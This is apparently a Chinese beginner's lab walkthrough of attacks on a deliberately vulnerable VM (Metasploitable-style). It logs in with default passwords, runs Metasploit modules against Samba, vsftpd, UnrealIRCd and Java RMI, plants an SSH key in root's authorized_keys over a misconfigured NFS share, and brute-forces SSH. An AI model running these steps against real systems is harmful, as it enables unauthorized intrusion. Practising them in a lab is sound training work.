小白黑客是如何進行漏洞攻防演練的
一、系統弱密碼登入
1、在kali上執行命令列telnet 192.168.26.129
2、Login和password都輸入msfadmin
3、登入成功,進入系統
4、測試如下:
二、MySQL弱密碼登入:
1、在kali上執行mysql –h 192.168.26.129 –u root
2、登入成功,進入MySQL系統
3、測試效果:
三、PostgreSQL弱密碼登入
1、在Kali上執行psql -h 192.168.26.129 –U postgres
2、輸入密碼:postgres
3、登入成功,進入postgresql系統
測試效果
四、VNC弱密碼登入
1、在kali圖形介面的終端中執行vncviewer 192.168.26.129
2、輸入密碼 password
3、登入成功,進入系統
測試效果:
五、Samba MS-RPC Shell 命令注入漏洞
利用步驟
1.在kali中執行msfconsole,啟動metasploit
2.Use
exploit/multi/samba/usermap_script,選擇漏洞庫
3.Set RHOST 192.168.160.131 設定要攻擊的機器IP
4.Exploit,開始攻擊
5.利用成功,執行uname –a 驗證
測試效果:
六、Vsftpd原始碼包後門漏洞
步驟
1、在kali中執行msfconsole,啟動metasploit
2、use
exploit/unix/ftp/vsftpd_234_backdoor,選擇漏洞
3、set RHOST 192.168.160.131
4、利用成功,執行uname –a 驗證
5、測試過程:
七、UnreallRCd後門漏洞
步驟
1、在kali中執行msfconsole,啟動metasploit
2、use
exploit/unix/irc/unreal_ircd_3281_backdoor,選擇漏洞
set RHOST 192.168.160.131 ,設定要攻擊的目標IP地址
3、開始攻擊
4、利用成功!使用uname –a 驗證
測試效果:
- Linux NFS共享目錄配置漏洞
問題:在(2)中需要建立 /tmp/test目錄並在目錄下建立,如未建立則不能進行下一步
步驟
- 在kali上執行命令rpcinfo –p 192.168.26.129 ,檢視nfs服務有無開啟
- showmount –e 192.168.26.129 檢視其設定的遠端目錄列表
- 輸入ssh-keygen 生成RSA公鑰
- 依次輸入:
(1)mount –t nfs 192.168.26.129://tmp/test(預先建立),把192.168.160.131的根目錄掛載到/tmp/test/下;
注:如果提示下圖中錯誤則需要/etc/init.d/rpcbind start 來啟動mount
(2)cat /root/.ssh/id_rsa.pub>>
/tmp/test/root/.ssh/authorized_keys,把生成的公鑰追加到靶機的authorized_keys下:
(3)ssh [email protected],實現無密碼登入
- Java RMI SERVER 命令執行漏洞(1099/tcp)
1.Nmap –p 0-65535 192.168.160.131 來檢視1099埠是否開啟
2.進入msfconsole框架,依次輸入以下命令:
1)use exploit/multi/misc/java_rmi_server
2)set RHOST 192.168.26.129(靶機的IP地址)
3)run
4)session
5)shell(進入meterpreter時執行)
十、Root使用者弱口令漏洞(SSH爆破)
步驟
- 輸入nmap –sV -O(大寫) 192.168.160.131 檢視SSh埠是否開啟
- 開啟metasploit framework 框架,依次輸入:
- use auxiliary/scanner/ssh/ssh_login
- set RHOSTS 192.168.160.131
- set USERNAME root
- set PASS_FILE pass.txt(字典檔案,需要預先生成)
- set THREADS 50
- run